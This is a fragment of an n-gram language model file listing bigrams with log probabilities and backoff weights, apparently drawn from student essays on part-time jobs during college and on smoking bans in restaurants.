-0.6942267 kills thousands -0.048957378
-3.4204583 the key -0.048957378
-3.5096595 , leading -0.048957378
-3.4650414 to join -0.048957378
-2.7130423 of attending -0.048957378
-2.3287637 when attending -0.048957378
-1.731922 still attending -0.048957378
-3.106568 in obtaining -0.048957378
-2.1483922 world obtaining -0.048957378
-1.8656976 without obtaining -0.048957378
-3.2979217 and time-management -0.048957378
-3.3047535 a semi-regular -0.048957378
-2.7983925 work regimen -0.048957378
-3.4204583 the oppressive -0.048957378
-3.5096595 , thought-controlling -0.048957378
-0.6942867 thought-controlling atmosphere -0.048957378
-2.4782233 people accustomed -0.048957378
-1.1710447 welcome shock -0.048957378
-3.4204583 the cloistered -0.048957378
-3.3047535 a fascinating -0.048957378
-2.1511507 world exists -0.048957378
-0.99501497 challenges exists -0.048957378
-3.4204583 the recommended -0.048957378
-0.6942867 recommended norms -0.048957378
-3.28005 of contemporary -0.048957378
-1.9447823 university thought -0.048957378
-0.9947796 concentrated thought -0.048957378
-1.1705118 critical thought -0.048957378
-1.1710447 thought patterns -0.048957378
-2.7713203 not apply -0.048957378
-2.9060166 are mocked -0.048957378
-2.7396104 as absurd -0.048957378
-3.5096595 , occupying -0.048957378
-0.6942867 occupying oneself -0.048957378
-1.6929126 outside activity -0.048957378
-1.2955703 extra-curricular activity -0.048957378
-0.9947796 physical activity -0.048957378
-2.7983925 work restricts -0.048957378
-1.0614876 bad habits -0.048957378
-2.1414988 social habits -0.048957378
-1.293971 sleeping habits -0.048957378
-1.3902439 healthy habits -0.048957378
-0.9942178 recreational habits -0.048957378
-1.4715303 habits deleterious -0.048957378
-3.644728 <s> Said -0.048957378
-1.1710447 include extended -0.048957378
-0.6942867 extended periods -0.048957378
-0.995135 video game -0.048957378
-0.6942867 game playing -0.048957378
-3.5096595 , lounging -0.048957378
-2.401619 fs sofa -0.048957378
-0.6942867 sofa watching -0.048957378
-0.6942867 watching daytime -0.048957378
-0.6942867 daytime television -0.048957378
-3.5096595 , indulging -0.048957378
-3.1293185 in repeated -0.048957378
-0.6942867 repeated bouts -0.048957378
-3.28005 of binge -0.048957378
-2.7309246 with equally -0.048957378
-0.6942867 equally dissolute -0.048957378
-2.469975 an obsessive -0.048957378
-0.6942867 obsessive devotion -0.048957378
-3.4163227 to online -0.048957378
-2.0856535 learning online -0.048957378
-0.69410884 Playing online -0.048957378
-1.1710447 online fleshpots -0.048957378
-0.6942867 fleshpots promising -0.048957378
-3.2799814 and sexual -0.048957378
-0.6942267 promising sexual -0.048957378
-0.995135 sexual release -0.048957378
-3.1293185 in exchange -0.048957378
-3.1303647 is split -0.048957378
-1.5961065 therefore behooves -0.048957378
-3.4650414 to arrange -0.048957378
-2.7713203 not bear -0.048957378
-0.6942867 bear mentioning -0.048957378
-3.09512 <s> One -0.187397
-2.1054032 any REAL -0.048957378
-3.644728 <s> Nor -0.048957378
-2.8665538 the efforts -0.048957378
-2.9977748 their efforts -0.048957378
-0.69410884 anti-smoking efforts -0.048957378
-2.0880563 good life-lesson -0.048957378
-1.1710447 hopefully tie-in -0.048957378
-2.7396104 as failure -0.048957378
-1.9465656 own disciplines -0.048957378
-3.4650414 to achieve -0.048957378
-3.4204583 the greatest -0.048957378
-0.6942867 greatest assets -0.048957378
-1.5383809 obtain control -0.048957378
-3.2799814 and desires -0.048957378
-2.3987331 fs desires -0.048957378
-2.4782233 people depend -0.048957378
-1.8383849 right track -0.048957378
-2.2890806 so spoiled -0.048957378
-2.2313263 these spoiled -0.048957378
-1.4704666 everything paid -0.048957378
-1.4704666 already paid -0.048957378
-1.2950919 approach paid -0.048957378
-3.4204583 the much-needed -0.048957378
-2.401619 fs self -0.048957378
-2.45335 this transitional -0.048957378
-3.2908964 a transitional -0.048957378
-2.5982223 from dependence -0.048957378
-2.7282374 I shall -0.048957378
-2.2854536 we shall -0.048957378
-0.69410884 reckoning shall -0.048957378
-2.4028242 my claim -0.048957378
-3.4204583 the domestic -0.048957378
-0.6942867 domestic front -0.048957378
-1.5382957 generally leaves -0.048957378
-3.4204583 the security -0.048957378
-1.8681672 family unit -0.048957378
-3.246793 and begins -0.048957378
-1.1868148 he begins -0.187397
-1.2950919 schedule begins -0.048957378
-3.4650414 to strike -0.048957378
-3.3047535 a course-load -0.048957378
-1.3922309 encourage thoughts -0.048957378
-1.5378767 explore thoughts -0.048957378
-3.28005 of pecuniary -0.048957378
-3.2799814 and changing -0.048957378
-2.0511177 his changing -0.048957378
-2.8497334 they hobbies -0.048957378
-1.8375617 your hobbies -0.048957378
-3.4650414 to assert -0.048957378
-3.28005 of starting -0.048957378
-3.09512 <s> Whether -0.048957378
-2.7267487 will vary -0.048957378
-3.5096595 , courting -0.048957378
-3.4931862 , meeting -0.048957378
-1.5378767 generally meeting -0.048957378
-0.995135 meeting viable -0.048957378
-2.7309246 with whom -0.048957378
-3.644728 <s> Independent -0.048957378
-3.2676826 of supporting -0.048957378
-1.837449 income supporting -0.048957378
-2.222701 reasons stated -0.048957378
-1.5382957 generally fresh -0.048957378
-3.3047535 a firm -0.048957378
-3.0452757 for superiors -0.048957378
-2.0880563 good life-skill -0.048957378
-0.6942867 life-skill enhancements -0.048957378
-3.644728 <s> Searching -0.048957378
-2.7396104 as filling -0.048957378
-2.7796392 job interview -0.048957378
-3.4204583 the joys -0.048957378
-3.4204583 the pain -0.048957378
-1.868011 being rejected -0.048957378
-3.1293185 in cooperation -0.048957378
-3.2979217 and humble -0.048957378
-2.2339225 help relieve -0.048957378
-3.28005 of funding -0.048957378
-3.120598 is involved -0.048957378
-0.99501497 everyone involved -0.048957378
-2.7413492 I emphatically -0.048957378
-2.4128842 life style -0.048957378
-2.8983755 are individuals -0.048957378
-1.6920565 These individuals -0.048957378
-2.1061108 into adulthood -0.048957378
-2.469975 an indispensable -0.048957378
-1.2958019 highly recommend -0.048957378
-2.469975 an opportune -0.048957378
-2.1071095 young men -0.048957378
-2.7131412 or women -0.048957378
-2.415659 more women -0.048957378
-2.1375635 up THEIR -0.048957378
-0.6942867 THEIR interpretation -0.048957378
-3.3047535 a wonderful -0.048957378
-2.2910626 what meaning -0.048957378
-2.7659814 not applied -0.048957378
-2.7131412 or applied -0.048957378
-2.3793182 skills exactly -0.048957378
-2.532656 at Dairy -0.048957378
-0.6942867 Dairy Queens -0.048957378
-3.644728 <s> Well -0.048957378
-3.2799814 and handling -0.048957378
-2.5483203 money handling -0.048957378
-1.9465656 own accounts -0.048957378
-2.4573839 all add -0.048957378
-2.7665153 it comes -0.048957378
-1.6469738 freedom comes -0.048957378
-2.5645084 is indeed -0.048957378
-3.4931862 , indeed -0.048957378
-2.9631343 , reduces -0.048957378
-1.7714736 personal note -0.048957378
-2.7747319 job throughout -0.048957378
-1.1708648 off throughout -0.048957378
-3.644728 <s> Interestingly -0.048957378
-3.5096595 , exercised -0.048957378
-3.3624787 the greater -0.048957378
-2.1171923 much greater -0.048957378
-0.69410884 exercised greater -0.048957378
-1.5962766 helps defray -0.048957378
-3.4204583 the ever-increasing -0.048957378
-3.644728 <s> After -0.048957378
-2.7747319 job creates -0.048957378
-1.3923441 debt creates -0.048957378
-3.2979217 and burdens -0.048957378
-3.0111382 that newly -0.048957378
-3.120598 is newly -0.048957378
-0.995135 newly minted -0.048957378
-3.644728 <s> Reducing -0.048957378
-1.8384697 cases eliminating -0.048957378
-1.1710447 mental state -0.048957378
-3.4000094 the population -0.048957378
-1.1708648 greater population -0.048957378
-3.1293185 in contact -0.048957378
-2.4573839 all walks -0.048957378
-3.4204583 the myriad -0.048957378
-1.5961916 place cwhich -0.048957378
-3.5096595 , isn -0.048957378
-2.7413492 I couldn -0.048957378
-1.5382957 quite shocked -0.048957378
-2.7972748 have perfected -0.048957378
-3.2979217 and begging -0.048957378
-2.7659814 not outright -0.048957378
-2.4667776 an outright -0.048957378
-0.995135 outright demanding -0.048957378
-2.8541157 they shell -0.048957378
-2.0890174 out outrageous -0.048957378
-1.295562 small amounts -0.048957378
-0.6942267 outrageous amounts -0.048957378
-2.7925994 have nothing -0.048957378
-1.8948483 really nothing -0.048957378
-1.8373363 : wrong -0.048957378
-0.99501497 nothing wrong -0.048957378
-2.7364948 on ski -0.048957378
-0.6942867 ski trips -0.048957378
-3.5096595 , traveling -0.048957378
-3.2799814 and enjoying -0.048957378
-3.2676826 of enjoying -0.048957378
-3.0246768 for probably -0.048957378
-3.4625692 , probably -0.048957378
-2.410627 also probably -0.048957378
-1.9225851 those dollars -0.048957378
-2.9631343 , namely -0.048957378
-2.7551584 and consequently -0.048957378
-1.4711709 educational institutes -0.048957378
-1.1708648 loan institutes -0.048957378
-2.6468444 student household -0.048957378
-2.7357929 as household -0.048957378
-3.28005 of parental -0.048957378
-0.6942867 parental accommodation -0.048957378
-1.1710447 largely financed -0.048957378
-2.7186737 or guardians -0.187397
-0.995135 enormous sum -0.048957378
-2.880715 be subsidized -0.048957378
-3.2908964 a third -0.048957378
-3.2799814 and third -0.048957378
-1.1710447 rarely adequate -0.048957378
-1.6926544 balance expenditure -0.048957378
-2.7708824 it yields -0.048957378
-3.2908964 a double -0.048957378
-2.1384466 after double -0.048957378
-0.995135 double bonus -0.048957378
-3.4204583 the character-building -0.048957378
-0.6942867 character-building aspect -0.048957378
-2.7983925 work influences -0.048957378
-3.0452757 for younger -0.048957378
-0.995135 household earners -0.048957378
-2.0337405 future professions -0.048957378
-2.233546 in terms -0.27955192
-3.5096595 , diligence -0.048957378
-2.859086 be said -0.048957378
-2.9982424 that said -0.048957378
-1.2950919 That said -0.048957378
-3.4000094 the beginning -0.048957378
-3.2799814 and beginning -0.048957378
-2.1194625 This relief -0.048957378
-1.5956279 great relief -0.048957378
-2.097305 -LRB- due -0.048957378
-2.7404244 college due -0.048957378
-0.9944986 relief due -0.048957378
-0.69396824 unread due -0.048957378
-1.5961065 been shown -0.048957378
-2.880715 be traumatizing -0.048957378
-2.7413492 I totally -0.048957378
-3.1303647 is pretty -0.048957378
-2.182114 has similarities -0.048957378
-2.7143507 will essentially -0.048957378
-3.246793 and essentially -0.048957378
-2.2854536 we essentially -0.048957378
-3.5096595 , sit -0.048957378
-0.6942867 sit quietly -0.048957378
-1.9698664 our feet -0.048957378
-3.2979217 and spontaneous -0.048957378
-0.6942867 spontaneous feedback -0.048957378
-2.7186737 or aren -0.048957378
-2.1210358 This dimension -0.048957378
-2.920025 to perform -0.048957378
-3.1303647 is somewhat -0.048957378
-0.6942867 somewhat lacking -0.048957378
-2.1047764 spend anyway -0.048957378
-1.7337555 opinion anyway -0.048957378
-2.2432292 only remember -0.048957378
-1.7332089 still remember -0.048957378
-2.052458 first paycheck -0.048957378
-3.4204583 the impression -0.048957378
-2.7708824 it gave -0.048957378
-2.418582 also seemed -0.048957378
-3.0178597 that peculiar -0.048957378
-0.6942867 peculiar sort -0.048957378
-2.4184146 more cautious -0.048957378
-1.895859 less apt -0.048957378
-3.6294703 <s> Yet -0.048957378
-0.99501497 c Yet -0.048957378
-2.7413492 I guess -0.048957378
-3.4000094 the primary -0.048957378
-2.3729722 The primary -0.048957378
-3.644728 <s> Anything -0.048957378
-1.4716156 club membership -0.048957378
-3.1303647 is supplementary -0.048957378
-3.644728 <s> Extra -0.048957378
-1.5382957 local fast-food -0.048957378
-3.2979217 and hopes -0.048957378
-3.3047535 a computer -0.048957378
-0.6942867 computer programmer -0.048957378
-3.2908964 a burger -0.048957378
-2.1034224 then burger -0.048957378
-0.995135 burger flipping -0.048957378
-3.3047535 a decidedly -0.048957378
-3.2085369 a negative -0.048957378
-2.678043 or negative -0.048957378
-1.5924584 potential negative -0.048957378
-0.6938276 decidedly negative -0.048957378
-0.9942178 negligible negative -0.048957378
-3.3047535 a first-year -0.048957378
-1.4715303 already stretched -0.048957378
-0.6942867 stretched thin -0.048957378
-3.28005 of college-level -0.048957378
-3.120598 is negligible -0.048957378
-1.1708648 almost negligible -0.048957378
-2.880715 be fine -0.048957378
-3.4650414 to take-up -0.048957378
-2.7659814 not solely -0.048957378
-1.1708648 left solely -0.048957378
-2.9767401 students ' -0.048957378
-1.9693077 restaurants ' -0.048957378
-0.995135 ' discretion -0.048957378
-3.4650414 to sharpen -0.048957378
-3.4204583 the in-class -0.048957378
-3.1303647 is supplemented -0.048957378
-0.99501497 lab experiments -0.048957378
-0.6942267 chemistry experiments -0.048957378
-2.7186737 or casework -0.048957378
-2.7665153 it virtually -0.048957378
-2.8983755 are virtually -0.048957378
-0.99501497 virtually impossible -0.048957378
-0.99501497 near impossible -0.048957378
-2.7516315 a heavy -0.048957378
-3.4204583 the detriment -0.048957378
-3.1215048 in physical -0.048957378
-3.014355 their physical -0.048957378
-3.018787 a health -0.048957378
-2.0139756 the health -0.3183926
-2.068815 any health -0.048957378
-2.3659418 and health -0.13618872
-3.1322563 to health -0.048957378
-2.8239956 their health -0.048957378
-2.016018 's health -0.048957378
-1.5825555 potential health -0.048957378
-1.7513353 personal health -0.048957378
-1.917516 own health -0.048957378
-1.3848785 negative health -0.048957378
-0.99169886 physical health -0.048957378
-0.6925645 proven health -0.048957378
-0.6925645 improving health -0.048957378
-3.644728 <s> Everyone -0.048957378
-2.1210358 This applies -0.048957378
-2.7972748 have extracurricular -0.048957378
-3.644728 <s> What -0.048957378
-3.5096595 , picking -0.048957378
-2.7312138 a healthy -0.048957378
-3.428628 , healthy -0.048957378
-0.9944986 wants healthy -0.048957378
-1.469627 few healthy -0.048957378
-2.7396104 as devoting -0.048957378
-3.4650414 to exercising -0.048957378
-3.2799814 and recreational -0.048957378
-3.014355 their recreational -0.048957378
-3.0230536 their resumes -0.048957378
-3.3047535 a well-rounded -0.048957378
-2.9060166 are introduced -0.048957378
-3.4204583 the tedious -0.048957378
-2.5503032 in mind -0.048957378
-2.9787707 their mind -0.048957378
-2.3897333 my mind -0.048957378
-1.3909432 healthy mind -0.048957378
-2.1525254 most curious -0.048957378
-1.8679262 new phase -0.048957378
-2.880715 be encountering -0.048957378
-2.8541157 they share -0.048957378
-2.7396104 as swimming -0.048957378
-2.7186737 or chemistry -0.048957378
-1.8679262 new light -0.048957378
-0.6942867 light bulb -0.048957378
-2.880715 be cherished -0.048957378
-2.722524 will miss -0.048957378
-3.4479775 to miss -0.048957378
-2.144826 social ideas -0.048957378
-1.644695 main ideas -0.048957378
-1.8633474 new ideas -0.048957378
-0.69396824 sharing ideas -0.048957378
-3.4204583 the academics -0.048957378
-3.4204583 the dormitory -0.048957378
-2.873293 be offered -0.048957378
-1.4498333 activities offered -0.187397
-1.8655307 being exposed -0.048957378
-2.8837602 are exposed -0.048957378
-2.3287637 when exposed -0.048957378
-3.4650414 to group -0.048957378
-3.0230536 their peers -0.048957378
-3.644728 <s> Living -0.048957378
-3.2979217 and sharing -0.048957378
-3.4000094 the dorm -0.048957378
-1.6465397 same dorm -0.048957378
-3.3047535 a permanent -0.048957378
-0.6942867 permanent bond -0.048957378
-1.1705118 fall behind -0.048957378
-1.1705118 left behind -0.048957378
-0.9947796 significantly behind -0.048957378
-2.7665153 it won -0.048957378
-2.8497334 they won -0.048957378
-0.995135 won ` -0.048957378
-0.6942867 ` t -0.048957378
-3.4650414 to participate -0.048957378
-3.0452757 for awareness -0.048957378
-3.1303647 is worried -0.048957378
-3.644728 <s> Personally -0.048957378
-2.401619 fs terribly -0.048957378
-1.8680959 without starving -0.048957378
-2.342011 would deem -0.048957378
-3.2908964 a dollar -0.048957378
-2.1031985 If dollar -0.048957378
-3.644728 <s> Don -0.048957378
-3.3624787 the 40 -0.048957378
-2.7024844 or 40 -0.048957378
-1.4704666 around 40 -0.048957378
-3.4650414 to 45 -0.048957378
-3.014355 their exams -0.048957378
-1.295562 pass exams -0.048957378
-2.1524544 social clicks -0.048957378
-0.995135 avoid drugs -0.048957378
-2.1524544 social rejection -0.048957378
-2.9060166 are thrown -0.048957378
-2.561393 working dogs -0.048957378
-3.4204583 the remainder -0.048957378
-1.969951 other paths -0.048957378
-3.0382125 for distracting -0.048957378
-2.8983755 are distracting -0.048957378
-1.8678414 was original -0.048957378
-2.6507893 student decides -0.048957378
-2.7267487 will deter -0.048957378
-3.5096595 , he\/she -0.048957378
-2.4573839 all energies -0.048957378
-3.1303647 is conducive -0.048957378
-1.6475859 makes decisions -0.048957378
-2.7396104 as open -0.048957378
-3.644728 <s> Failure -0.048957378
-2.1200047 much larger -0.048957378
-0.99501497 grow larger -0.048957378
-0.995135 larger possibility -0.048957378
-3.4204583 the administration -0.048957378
-3.1303647 is treating -0.048957378
-3.644728 <s> Consequently -0.048957378
-2.7796392 job poses -0.048957378
-3.3047535 a threat -0.048957378
-3.09512 <s> Money -0.187397
-3.3047535 a distracter -0.048957378
-2.9818435 students boils -0.048957378
-1.3916435 hold down -0.048957378
-0.69410884 boils down -0.048957378
-1.1706803 holding down -0.048957378
-2.0331504 about networking -0.048957378
-3.2979217 and landing -0.048957378
-3.1303647 is ideal -0.048957378
-2.7437143 not properly -0.048957378
-2.4973617 jobs properly -0.048957378
-1.5938057 done properly -0.048957378
-1.3909432 eat properly -0.048957378
-3.644728 <s> Training -0.048957378
-3.4650414 to train -0.048957378
-3.3047535 a temporary -0.048957378
-3.4000094 the pursuit -0.048957378
-2.0511177 his pursuit -0.048957378
-3.09512 <s> Any -0.048957378
-2.2090015 studies lay -0.048957378
-3.4650414 to forgo -0.048957378
-1.2958019 him physically -0.048957378
-0.995135 Any forms -0.048957378
-3.2676826 of exhaustion -0.048957378
-2.5949488 from exhaustion -0.048957378
-0.995135 exhaustion interferes -0.048957378
-3.28005 of offering -0.048957378
-2.880715 be weighed -0.048957378
-1.1710447 economic crisis -0.048957378
-3.2908964 a middle -0.048957378
-3.4931862 , middle -0.048957378
-1.1710447 middle aged -0.048957378
-0.995135 married couples -0.048957378
-2.121458 even elderly -0.048957378
-3.102048 is heavily -0.048957378
-2.8837602 are heavily -0.048957378
-0.69410884 profits heavily -0.048957378
-3.5096595 , severely -0.048957378
-2.2909184 so disparate -0.048957378
-2.7708678 <s> Currently -0.13618872
-3.644728 <s> Why -0.048957378
-2.387195 do dropout -0.048957378
-3.4650414 to losing -0.048957378
-2.0881407 become trapped -0.048957378
-3.4204583 the image -0.048957378
-1.1710447 material goods -0.048957378
-2.469975 an exciting -0.048957378
-1.3923441 earned versus -0.048957378
-0.99501497 disadvantage versus -0.048957378
-3.4204583 the boring -0.048957378
-3.28005 of uninteresting -0.048957378
-3.644728 <s> Communication -0.048957378
-3.4204583 the media -0.048957378
-3.3047535 a typical -0.048957378
-3.2799814 and smaller -0.048957378
-1.8676198 getting smaller -0.048957378
-2.7044797 can possibly -0.048957378
-3.2799814 and possibly -0.048957378
-0.995135 possibly gather -0.048957378
-2.0510054 often seek -0.048957378
-3.4479775 to seek -0.048957378
-2.3748312 many establishments -0.048957378
-1.1709782 entertainment establishments -0.048957378
-3.2799814 and bars -0.048957378
-2.7357929 as bars -0.048957378
-3.2799814 and nightclubs -0.048957378
-2.7131412 or nightclubs -0.048957378
-2.4667776 an obvious -0.048957378
-2.1511004 most obvious -0.048957378
-2.4184146 more attracted -0.048957378
-3.4000094 the lucrative -0.048957378
-2.165397 very lucrative -0.048957378
-0.995135 lucrative tips -0.048957378
-3.2908964 a Las -0.048957378
-3.1215048 in Las -0.048957378
-0.40954217 Las Vegas -0.048957378
-0.995135 Vegas casino -0.048957378
-2.880715 be mesmerized -0.048957378
-3.28005 of winning -0.048957378
-3.4204583 the tables -0.048957378
-3.3047535 a nationwide -0.048957378
-0.6942867 nationwide boom -0.048957378
-2.726789 with Texas -0.048957378
-3.4931862 , Texas -0.048957378
-0.40954217 Texas Hold -0.187397
-0.6942867 Hold eEm -0.187397
-0.6942867 eEm Poker -0.048957378
-3.1215048 in North -0.048957378
-0.6942267 swept North -0.048957378
-3.644728 <s> Recently -0.048957378
-3.2649243 a poker -0.048957378
-1.645653 professional poker -0.048957378
-1.1705118 online poker -0.048957378
-2.1063418 young players -0.048957378
-1.1708648 poker players -0.048957378
-2.7516315 a diploma -0.048957378
-2.165397 very popular -0.048957378
-2.2890806 so popular -0.048957378
-2.7972748 have evolved -0.048957378
-2.9060166 are skilled -0.048957378
-2.2803774 some luck -0.048957378
-3.4000094 the prize -0.048957378
-0.6942267 grand prize -0.048957378
-1.8679262 new trend -0.048957378
-2.182114 has swept -0.048957378
-3.2979217 and continues -0.048957378
-3.644728 <s> Playing -0.048957378
-1.8679262 new addictive -0.048957378
-0.6942867 addictive drug -0.048957378
-3.09512 <s> You -0.187397
-2.7972748 have access -0.048957378
-0.995135 play 24 -0.048957378
-3.4479775 to win -0.048957378
-1.3922309 ultimately win -0.048957378
-0.995135 win substantial -0.048957378
-1.2958019 cash prizes -0.048957378
-1.1710447 poker tournament -0.048957378
-3.4204583 the grand -0.048957378
-2.469975 an incomplete -0.048957378
-3.644728 <s> Assuming -0.048957378
-2.920025 to worry -0.27955192
-3.4650414 to invest -0.048957378
-2.7267487 will respond -0.048957378
-2.1219382 parents proud -0.048957378
-2.880715 be plainly -0.048957378
-2.3119407 be divided -0.048957378
-3.644728 <s> Troubles -0.048957378
-3.4000094 the goals -0.048957378
-0.6942267 term goals -0.048957378
-1.538719 once established -0.048957378
-2.3332694 when applying -0.048957378
-1.4715303 My brother -0.048957378
-1.295562 finally dropped -0.048957378
-0.6942267 brother dropped -0.048957378
-3.28005 of Northeastern -0.048957378
-3.1293185 in Massachusetts -0.048957378
-0.995135 double majoring -0.048957378
-3.1293185 in physics -0.048957378
-2.532656 at Disney -0.048957378
-2.561393 working holiday -0.048957378
-3.4204583 the chances -0.048957378
-3.3624787 the partying -0.048957378
-2.7283971 as partying -0.048957378
-2.7024844 or partying -0.048957378
-2.4184146 more serious -0.048957378
-1.8381437 A budgeted -0.048957378
-2.181358 could stem -0.048957378
-1.1710447 partying funds -0.048957378
-1.3926156 concentrate 100 -0.048957378
-2.4562922 this distracts -0.048957378
-2.7516315 a reasonable -0.048957378
-2.7912447 the restaurants -0.048957378
-2.02035 in restaurants -0.08422062
-3.2391717 to restaurants -0.048957378
-2.6790822 on restaurants -0.048957378
-2.632936 or restaurants -0.048957378
-1.9418701 at restaurants -0.048957378
-1.5416769 all restaurants -0.27406517
-1.3874582 non-smoking restaurants -0.048957378
-0.6932658 includes restaurants -0.048957378
-1.7722225 friends whenever -0.048957378
-3.3047535 a vicious -0.048957378
-2.562118 should postpone -0.048957378
-3.4204583 the greal -0.048957378
-2.387195 do housework -0.048957378
-3.2979217 and chores -0.048957378
-3.644728 <s> Governments -0.048957378
-3.2085369 a ban -0.048957378
-2.8836398 to ban -0.27955192
-0.9942178 outright ban -0.048957378
-0.9942178 total ban -0.187397
-2.1427004 smoking ban -0.048957378
-2.2911956 who employ -0.048957378
-3.644728 <s> Advising -0.048957378
-2.8541157 they possess -0.048957378
-3.28005 of Mammon -0.048957378
-2.401619 fs glittering -0.048957378
-0.6942867 glittering bounty -0.048957378
-1.5961065 both wrong-headed -0.048957378
-3.2979217 and short-sighted -0.048957378
-3.644728 <s> Anyone -0.048957378
-1.2958019 ever known -0.048957378
-2.6507893 student appreciates -0.048957378
-3.4204583 the acquisition -0.048957378
-3.644728 <s> Interrupting -0.048957378
-2.4562922 this headlong -0.048957378
-0.6942867 headlong charge -0.048957378
-3.0452757 for enlightenment -0.048957378
-3.28005 of demons -0.048957378
-2.7477093 a man -0.048957378
-2.1063418 young man -0.048957378
-2.0523734 his bursary -0.048957378
-2.104994 -LRB- Beware -0.048957378
-2.2911956 who extol -0.048957378
-3.644728 <s> Their -0.048957378
-3.28005 of reckoning -0.048957378
-1.3925304 every waking -0.048957378
-1.2958019 hour digesting -0.048957378
-1.5961065 great dollops -0.048957378
-3.28005 of nourishing -0.048957378
-0.6942867 nourishing scholarship -0.048957378
-0.6942867 scholarship fed -0.048957378
-0.995135 teaching assistants -0.048957378
-0.995135 newly coined -0.048957378
-2.880715 be dispensed -0.048957378
-3.2979217 and mastered -0.048957378
-0.995135 dollar signs -0.048957378
-2.9060166 are dancing -0.048957378
-2.3029737 if raw -0.048957378
-0.6942867 raw cupidity -0.048957378
-0.6942867 cupidity corrupts -0.048957378
-2.0523734 his soul -0.048957378
-2.3029737 if contemplating -0.048957378
-0.6942867 contemplating materialist -0.048957378
-0.6942867 materialist purchases -0.048957378
-0.6942867 purchases disturbs -0.048957378
-3.644728 <s> Disrupting -0.048957378
-2.4562922 this evolving -0.048957378
-0.6942867 evolving relationship -0.048957378
-2.4199624 by saddling -0.048957378
-3.4204583 the questing -0.048957378
-3.2908964 a minimum -0.048957378
-3.4931862 , minimum -0.048957378
-0.995135 wage drudgery -0.048957378
-2.4199624 by interfering -0.048957378
-3.4204583 the ceaseless -0.048957378
-0.6942867 ceaseless cogitation -0.048957378
-2.291517 one embraces -0.048957378
-2.469975 an obscene -0.048957378
-0.6942867 obscene perversion -0.048957378
-3.1303647 is holy -0.048957378
-3.644728 <s> Never -0.048957378
-3.644728 <s> Again -0.048957378
-3.4204583 the carrels -0.048957378
-3.0452757 for undivided -0.048957378
-1.9211627 academic attention -0.048957378
-0.6942267 undivided attention -0.048957378
-2.2090015 studies across -0.048957378
-1.8679262 new barricades -0.048957378
-0.995135 so-called gGreat -0.048957378
-0.6942867 gGreat Works -0.048957378
-1.295562 h \ -0.048957378
-0.6942267 misogyny \ -0.048957378
-0.995135 \ rightly -0.048957378
-0.6942867 rightly unread -0.048957378
-3.0230536 their relentless -0.048957378
-0.6942867 relentless racism -0.048957378
-3.2979217 and misogyny -0.048957378
-1.9698664 our cobblestones -0.048957378
-3.5096595 , unite -0.048957378
-1.1710447 essentially shape -0.048957378
-3.2979217 and passing -0.048957378
-0.6942867 passing examinations -0.048957378
-0.995135 convenience stores -0.048957378
-1.1710447 stay awake -0.048957378
-2.4510674 them failing -0.048957378
-1.868011 being asked -0.048957378
-3.0178597 that obstructs -0.048957378
-2.880715 be discouraged -0.048957378
-3.3047535 a tool -0.048957378
-3.0230536 their sons -0.048957378
-2.7186737 or daughters -0.048957378
-3.0230536 their dreams -0.048957378
-0.6942867 dreams dashed -0.048957378
-2.7364948 on behalf -0.048957378
-2.24509 only hurting -0.048957378
-2.418582 also destroying -0.048957378
-3.1293185 in low-skilled -0.048957378
-3.4650414 to flip -0.048957378
-1.5384661 importance whatsoever -0.048957378
-2.7713203 not pertain -0.048957378
-3.4000094 the U.S. -0.048957378
-2.1511004 most U.S. -0.048957378
-2.7267487 will voice -0.048957378
-3.1303647 is admitted -0.048957378
-3.644728 <s> Conversely -0.048957378
-0.6942867 Conversely speaking -0.048957378
-3.4204583 the United -0.048957378
-0.6942867 United States -0.048957378
-2.8176763 time consuming -0.048957378
-2.8176763 time commuting -0.048957378
-3.120598 is merely -0.048957378
-2.0508933 than merely -0.048957378
-3.4204583 the obligatory -0.048957378
-3.4650414 to sustain -0.048957378
-1.3925304 healthy existence -0.048957378
-2.7143507 will eat -0.048957378
-2.5898018 to eat -0.04895735
-2.4699326 people eat -0.048957378
-2.7357929 as opposed -0.048957378
-1.5378767 am opposed -0.048957378
-3.1303647 is taken-on -0.048957378
-2.880715 be compromised -0.048957378
-2.7309246 with excellence -0.048957378
-3.0382125 for finishing -0.048957378
-0.99501497 merely finishing -0.048957378
-0.995135 finishing sake -0.048957378
-2.880715 be burdened -0.048957378
-3.28005 of fiscal -0.048957378
-2.447429 that none -0.048957378
-2.562118 should assume -0.048957378
-3.4204583 the academically -0.048957378
-0.6942867 academically minded -0.048957378
-1.8381437 A high-school -0.048957378
-1.5382957 generally focuses -0.048957378
-3.28005 of mastering -0.048957378
-3.4204583 the foremost -0.048957378
-1.5382957 explore concepts -0.048957378
-1.1710447 greater detail -0.048957378
-3.1215048 in depth -0.048957378
-3.2799814 and depth -0.048957378
-3.2979217 and analysis -0.048957378
-3.4000094 the mundane -0.048957378
-2.5949488 from mundane -0.048957378
-2.9982424 that holding -0.048957378
-3.244391 of holding -0.048957378
-1.8042351 days holding -0.048957378
-2.2432292 only distract -0.048957378
-1.5378767 simply distract -0.048957378
-3.2979217 and hamstring -0.048957378
-0.995135 overall efficacy -0.048957378
-1.1710447 developing himself -0.048957378
-3.5096595 , confident -0.048957378
-3.644728 <s> His -0.048957378
-2.880715 be plenty -0.187397
-2.7267487 will negatively -0.048957378
-1.5382957 long term -0.048957378
-1.3923441 times past -0.048957378
-1.5378767 long past -0.048957378
-1.9698664 our father -0.048957378
-3.2979217 and grandfather -0.048957378
-3.4650414 to supply -0.048957378
-3.3047535 a modest -0.048957378
-3.2676826 of five -0.048957378
-3.4479775 to five -0.048957378
-2.0523734 his wife -0.048957378
-3.2979217 and carrying -0.048957378
-3.4204583 the entrance -0.048957378
-3.4204583 the work-force -0.048957378
-0.6942867 work-force coupled -0.048957378
-2.0867398 become near -0.048957378
-0.6942267 graduated near -0.048957378
-3.4650414 to adequately -0.048957378
-3.3047535 a four-year -0.048957378
-2.7186737 or woman -0.048957378
-1.6470779 fully dedicating -0.048957378
-3.644728 <s> Achieving -0.048957378
-1.8388427 high marks -0.048957378
-2.8176763 time devoted -0.048957378
-2.880715 be safe-guarded -0.048957378
-3.4204583 the maximum -0.048957378
-2.7713203 not diluted -0.048957378
-2.726789 with worries -0.048957378
-0.99501497 mundane worries -0.048957378
-1.1710447 schedules associated -0.048957378
-3.2979217 and hold-down -0.048957378
-3.644728 <s> Let -0.048957378
-3.4204583 the ultimate -0.048957378
-1.734651 against anybody -0.048957378
-1.5961065 great advances -0.048957378
-2.0867398 become distracted -0.048957378
-2.2787373 get distracted -0.048957378
-2.7267487 will falter -0.048957378
-3.0230536 their schoolwork -0.048957378
-3.5096595 , standing -0.048957378
-3.3047535 a hurry -0.048957378
-2.880715 be pressured -0.048957378
-3.2979217 and running -0.048957378
-1.392954 becoming overwhelmed -0.048957378
